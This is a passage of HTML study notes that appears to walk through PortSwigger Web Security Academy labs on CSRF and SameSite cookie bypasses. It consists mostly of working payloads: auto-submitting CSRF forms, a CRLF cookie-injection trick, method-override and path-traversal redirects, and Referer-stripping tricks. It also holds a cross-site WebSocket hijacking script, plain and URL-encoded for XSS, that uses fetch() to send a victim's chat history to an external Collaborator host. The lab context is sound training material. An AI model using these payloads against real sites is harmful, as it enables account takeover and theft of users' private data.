d. update the value: CSRF token and cookei  --  abcd1234  
   Cookie: session=070ciSVoUcfuKbNkq6R0TZ3ug0uMQnQy; csrf=abcd1234 &amp;&amp; email=firstCHANGE%40mail.com&amp;csrf=abcd1234  --  302 Found

3. navigate: home page: search a string  --  RESPONSE  HTTP/2 200 OK Set-Cookie: LastSearchTerm=apple; Secure; HttpOnly

YOU CAN ALSO SOLVE THIS LAB BY WRITTING A FAKE CSRF TOKEN AND COOKIE  --  then their is no need to intercept the request

4. update the wiener&#x27;s email while intercepting the request  
5. send to the repeater and turn off the intercept, also drop all the request
6. generate a CSRF PoC  --  update the email value

CSRF PAYLOAD

&lt;!DOCTYPE html&gt;
&lt;html lang=&quot;en&quot;&gt;
	&lt;body&gt;
		&lt;form method=&quot;POST&quot; action=&quot;https://lab-id.web-security-academy.net/my-account/change-email&quot;&gt;
			&lt;input type=&quot;hidden&quot; name=&quot;email&quot; value=&quot;anotherCHANGE@mail.com&quot;&gt;
			&lt;input type=&quot;hidden&quot; name=&quot;csrf&quot; value=&quot;LAQXGMz6Eg2DW8mxeHcKSkNQdY20n78q&quot;&gt;
			&lt;input type=&quot;submit&quot; value=&quot;Submit Request&quot;&gt;
		&lt;/form&gt;
		&lt;img src=&quot;https://lab-id.web-security-academy.net/?search=apple%0d%0aSet-Cookie:%20csrf=LAQXGMz6Eg2DW8mxeHcKSkNQdY20n78q%3b%20SameSite=None&quot; onerror=&quot;document.forms[0].submit()&quot;&gt;
	&lt;/body&gt;
&lt;/html&gt;


POST ANALYSIS 
src=&quot;payload&quot;  --  https://lab-id.web-security-academy.net/?search=apple Set-Cookie: csrf=LAQXGMz6Eg2DW8mxeHcKSkNQdY20n78q; SameSite=None

7. press the back button of the browser  --  do not refresh the browser
8. go to the exploit server deliver to the victim and done
9. NOTE if you viewed the exploit then update the email value</code></pre><h2 id="1f8d39dc-0232-809f-b0e8-e9e4412a50b3" class="">7. <strong>SameSite Lax bypass via method override</strong></h2><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="1f8d39dc-0232-8035-96f9-e05ef4ee3c3d" class="code"><code class="language-JavaScript">1. login
2. update: email  &amp;&amp;  navigate to the response: no protection against CSRF

TEST CASE
a. change to POST method to GET  --  Method Not Allowed

CONCLUSION
a. the default lax setting on this website means it only works with GET requests
b. when the method was changed from POST to GET, it showed &#x27;Method Not Allowed&#x27;

In Order To Exploit
a. supply a POST method in the GET parameter which we tried
   try parameter fuzzing to find which parameter is allowed  --  &amp;_method=POST  --  302 Found
   GET /my-account/change-email?email=mango%40fake.com&amp;_method=POST
   
3. generate a CSRF PoC  --  update the email value

CSRF PAYLOAD

&lt;!DOCTYPE html&gt;
&lt;html lang=&quot;en&quot;&gt;
	&lt;body&gt;
			&lt;form method=&quot;GET&quot; action=&quot;https://lab-id.web-security-academy.net/my-account/change-email&quot;&gt;
			&lt;input type=&quot;hidden&quot; name=&quot;email&quot; value=&quot;mango@fake.com&quot;&gt;
			&lt;input type=&quot;hidden&quot; name=&quot;_method&quot; value=&quot;POST&quot;&gt;
			&lt;input type=&quot;submit&quot; value=&quot;Submit Request&quot;&gt;
		&lt;/form&gt;
	&lt;/body&gt;
	&lt;script&gt;document.forms[0].submit();&lt;/script&gt;
&lt;/html&gt;


7. press the back button of the browser  --  do not refresh the browser
8. go to the exploit server deliver to the victim and done
9. NOTE if you viewed the exploit then update the email value

OR 

right click to the response and press Copy URL
&lt;script&gt;
location=&quot;https://lab-id.web-security-academy.net/my-account/change-email?email=mango%40fake.com&amp;_method=POST&quot;
&lt;/script&gt;</code></pre><h2 id="1f8d39dc-0232-803e-8906-db45d1ba2e67" class="">8. <strong>SameSite Strict bypass via client-side redirect</strong></h2><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="1f8d39dc-0232-807c-aeee-eff32f67601c" class="code"><code class="language-JavaScript">1. login
2. update: email  &amp;&amp;  navigate to the response: no protection against CSRF  &amp;&amp;  we have a new parameter: &amp;submit=1
3. navigate to the /login request

RESPONSE 
HTTP/2 302 Found
Location: /my-account?id=wiener
Set-Cookie: session=2MWzrHxSAKaVL4A6LpdFvwRIigR9PV8p; Secure; HttpOnly; SameSite=Strict

SameSite=Strict :(

4. update email request: send to repeater &amp;&amp; change the method from POST to GET  --  GET /my-account/change-email?email=apple%40fake.com&amp;submit=1
5. send the response  --  302 Found
6. go to Home page  --&gt;  view post  --&gt;  leave a comment

NOTICE  --  the website automatically redirected  --  Thank you for your comment!  Your comment has been submitted. You will be redirected momentarily. 

7. navigate to the /post/comment/confirmation?postId=1 request
8. change the postId=anyString  --  200 OK  --  RESPONSE  &lt;a href=&quot;/post/anyString&quot;&gt;Back to blog&lt;/a&gt;

TEST CASE
a. postId=1/  --  add a forward slash: to the end --  200 OK  --  RESPONSE  &lt;a href=&quot;/post/1/&quot;&gt;Back to blog&lt;/a&gt;
b. postId=1/../../../../my-account/  --  200 OK  
c. you can test: right click to the response and press Copy URL: paste: browser

PAYLOAD  --  update the email value

&lt;script&gt;
 location=&quot;https://lab-id.web-security-academy.net/post/comment/confirmation?postId=1/../../../../my-account/change-email?email=apple%40fake.com%26submit=1&quot;;
&lt;/script&gt;

9. go to the exploit server deliver to the victim and done
10. NOTE if you viewed the exploit then update the email value</code></pre><h2 id="1f8d39dc-0232-8090-b8ad-ce0c6b9219e7" class="">9. <strong>SameSite Strict bypass via sibling domain</strong></h2><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="1f8d39dc-0232-80d8-98f6-d850e266b346" class="code"><code class="language-JavaScript">1. navigate to the live chat
2. chat
3. navigate to the HTTPhistory: /chat  --  RESPONSE  HTTP/1.1 101 Switching Protocol
                                                     Connection: Upgrade
                                                     Upgrade: websocket
                                                     Sec-WebSocket-Accept: 0o10Sjg+aWXHxmkkVLxcjdQcfNA=
                                                     
4. click on the WebSockets history  --  you can see the messages  &amp;&amp;  how it worked

STUDY  --  LIVE CHAT FEATURE
Navigate to Proxy &gt; WebSockets history. 
When you refresh the page, you&#x27;ll see the browser sends a READY message to the server, prompting the server to return the full chat history.    

CONFIRM THE CSWSH VULNERABILITY
1. In Burp Suite, open the Collaborator tab and click Copy to clipboard to generate a new Collaborator payload. 
   It will be automatically copied to your clipboard.
2. In your browser, navigate to the exploit server and use the following template to craft a script demonstrating a Cross-Site WebSocket Hijacking 
   (CSWSH) PoC
   
 &lt;script&gt;
    var ws = new WebSocket(&#x27;wss://YOUR-LAB-ID.web-security-academy.net/chat&#x27;);
    ws.onopen = function() {
        ws.send(&quot;READY&quot;);
    };
    ws.onmessage = function(event) {
        fetch(&#x27;https://YOUR-COLLABORATOR-PAYLOAD.oastify.com&#x27;, {method: &#x27;POST&#x27;, mode: &#x27;no-cors&#x27;, body: event.data});
    };
&lt;/script&gt;     


3. store and view the exploit to test it yourself.
4. in Burp Suite, return to the Collaborator tab and click Poll now. You should see an HTTP interaction, confirming that a new live chat connection 
   was established with the target site.
5. note that while this confirms the CSWSH vulnerability, it only exfiltrates the chat history from a new session, 
   which isn&#x27;t very useful from an attacker&#x27;s perspective.     
   
CONCLUSION
a. because of the Samesite=strict protection: browser didn&#x27;t send the cookie
b. in order to exploit we need to execute our JS PAYLOAD  --  XSS  --  find: XSS  --  tried every input point: XSS failed
c. while initiating the first live chat their is a file named /resources/js/chat.js: also loaded: this can be seen in the HTTPhistory
   INTERESTING URL IN THE RESPONSE
   https://cms-lab-id.web-security-academy.net
   
d. navigate to the site  --  try XSS
                             XSS CONFIRMED
                             
6. send to repeater  &amp;&amp;  change the method form POST to GET   
7. url encode this script
 &lt;script&gt;
    var ws = new WebSocket(&#x27;wss://lab-id.web-security-academy.net/chat&#x27;);
    ws.onopen = function() {
        ws.send(&quot;READY&quot;);
    };
    ws.onmessage = function(event) {
        fetch(&#x27;https://YOUR-COLLABORATOR-PAYLOAD.oastify.com&#x27;, {method: &#x27;POST&#x27;, mode: &#x27;no-cors&#x27;, body: event.data});
    };
 &lt;/script&gt;  
 
8. copy and then paste: XSS injection point  --  repeater tab  
   GET /login?username=%20%3c%73%63%72%69%70%74%3e%0a%20%20%20%20%76%61%72%20%77%73%20%3d
   %20%6e%65%77%20%57%65%62%53%6f%63%6b%65%74%28%27%77%73%73%3a%2f%2f%6c%61%62%2d%69%64%77
   %65%62%2d%73%65%63%75%72%69%74%79%2d%61%63%61%64%65%6d%79%2e%6e%65%74%2f%63%68%61%74%27
   %29%3b%0a%20%20%20%20%77%73%2e%6f%6e%6f%70%65%6e%20%3d%20%66%75%6e%63%74%69%6f%6e%28%29
   %20%7b%0a%20%20%20%20%20%20%20%20%77%73%2e%73%65%6e%64%28%22%52%45%41%44%59%22%29%3b%0a
   %20%20%20%20%7d%3b%0a%20%20%20%20%77%73%2e%6f%6e%6d%65%73%73%61%67%65%20%3d%20%66%75%6e
   %63%74%69%6f%6e%28%65%76%65%6e%74%29%20%7b%0a%20%20%20%20%20%20%20%20%66%65%74%63%68%28
   %27%68%74%74%70%73%3a%2f%2f%62%75%72%70%2d%63%6f%6c%6c%61%62%6f%72%61%74%6f%72%2d%6c%69
   %6e%6b%2e%6f%61%73%74%69%66%79%2e%63%6f%6d%27%2c%20%7b%6d%65%74%68%6f%64%3a%20%27%50%4f
   %53%54%27%2c%20%6d%6f%64%65%3a%20%27%6e%6f%2d%63%6f%72%73%27%2c%20%62%6f%64%79%3a%20%65
   %76%65%6e%74%2e%64%61%74%61%7d%29%3b%0a%20%20%20%20%7d%3b%0a%3c%2f%73%63%72%69%70%74%3e%20&amp;password=mango
   
9. right click: click copy URL
10. navigate to the exploit server

PAYLOAD

&lt;script&gt;
document.location=&quot;COPIED-URL&quot;
&lt;/script&gt;

11. deliver to victim  &amp;&amp;  pull now your request: collaborator  
12. check the RESPONSE &amp;&amp;  login  &amp;&amp;  done</code></pre><h2 id="1f8d39dc-0232-80a9-92c3-e6e1fb13d635" class="">10. <strong>SameSite Lax bypass via cookie refresh</strong></h2><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="1f8d39dc-0232-80d0-b66f-eccf70693479" class="code"><code class="language-JavaScript">1. login: wiener user
2. press all the continue button  --  then: My account  --  update email
3. send this request to the repeater
4. again no CSRF protection
5. generate CSRF PoC  --  update the email value

CSRF PAYLOAD

&lt;!DOCTYPE html&gt;
&lt;html lang=&quot;en&quot;&gt;
	&lt;body&gt;
		&lt;form method=&quot;POST&quot; action=&quot;https://lab-id.web-security-academy.net/my-account/change-email&quot;&gt;
			&lt;input type=&quot;hidden&quot; name=&quot;email&quot; value=&quot;apple@mail.com&quot;&gt;
			&lt;input type=&quot;submit&quot; value=&quot;Submit Request&quot;&gt;
		&lt;/form&gt;
	&lt;/body&gt;
	&lt;script&gt;document.forms[0].submit();&lt;/script&gt;
&lt;/html&gt;
</code></pre><h2 id="1f8d39dc-0232-805d-8774-ca5d23d1808e" class="">11. <strong>CSRF where Referer validation depends on header being present</strong></h2><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="1f8d39dc-0232-8048-8195-e8f507832334" class="code"><code class="language-JavaScript">1. login: wiener user
2. update: email  &amp;&amp;  send this request to the repeater tab  &amp;&amp;  no CSRF protection

NEW HEADER
Referer: https://lab-id.web-security-academy.net/my-account?id=wiener

TEST CASE
a. update the email amd referer header:  https://google.com
   RESPONSE
   400 Bad request  --  Invalid Referer Header
   
b. what if we remove the referer header  --  302 Found

3. generate CSRF PoC  --  update the email value

&lt;!DOCTYPE html&gt;
&lt;html lang=&quot;en&quot;&gt;
	&lt;body&gt;
		&lt;form method=&quot;POST&quot; action=&quot;https://lab-id.web-security-academy.net/my-account/change-email&quot;&gt;
			&lt;input type=&quot;hidden&quot; name=&quot;email&quot; value=&quot;appleaeeee@mail.com&quot;&gt;
			&lt;input type=&quot;submit&quot; value=&quot;Submit Request&quot;&gt;
		&lt;/form&gt;
	&lt;/body&gt;
	&lt;script&gt;document.forms[0].submit();&lt;/script&gt;
&lt;/html&gt;

4. navigate to the exploit server  --  paste the payload  -- view exploit
   RESPONSE  --  invalid referer header  --  the browser atuomatically sets the referer header
   
BYPASS AUTOMATICALLY ADDING REFERER HEADER
a. add: Referrer-Policy: no-referrer  --  first way
b. add: &lt;meta name=&quot;referrer&quot; content=&quot;no-referrer&quot;&gt;  --  second way
   
8. go to the exploit server deliver to the victim and done
9. NOTE if you viewed the exploit then update the email value</code></pre><h2 id="1f8d39dc-0232-8042-a2f4-c34e6e8f6e40" class="">12. <strong>CSRF with broken Referer validation</strong></h2><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="1f8d39dc-0232-80d4-9d57-c9ccbda51310" class="code"><code class="language-JavaScript">1. login
2. update: email  &amp;&amp;  send this request to the repeater tab
3. remove: referer header
	         RESPONSE  -- Invalid referer header
	         
TEST CASE
a. add sub-domain to the referer header  --  302 Found
b. add a domain in place of sub-domain
   Referer: https://google.com/?lab-id.web-security-academy.net/my-account?id=wiener  --  302 Found
   
4. generate CSRF Poc  --  update email value

CSRF PAYLOAD

&lt;!DOCTYPE html&gt;
&lt;html lang=&quot;en&quot;&gt;
	&lt;body&gt;
		&lt;form method=&quot;POST&quot; action=&quot;https://lab-id.web-security-academy.net/my-account/change-email&quot;&gt;
			&lt;input type=&quot;hidden&quot; name=&quot;email&quot; value=&quot;apple@mail.com&quot;&gt;
			&lt;input type=&quot;submit&quot; value=&quot;Submit Request&quot;&gt;
		&lt;/form&gt;
		&lt;script&gt;
		  history.pushState(&#x27;&#x27;, &#x27;&#x27;, &#x27;/?lab-id.web-security-academy.net/my-account&#x27;)
		  document.forms[0].submit();
		&lt;/script&gt;
	&lt;/body&gt;
&lt;/html&gt;


5. add: Referrer-Policy: unsafe-url
6. deliver to the victim and done
7. NOTE if you viewed the exploit then update the email value
</code></pre></div></article><span class="sans" style="font-size:14px;padding-top:2em"></span></body></html>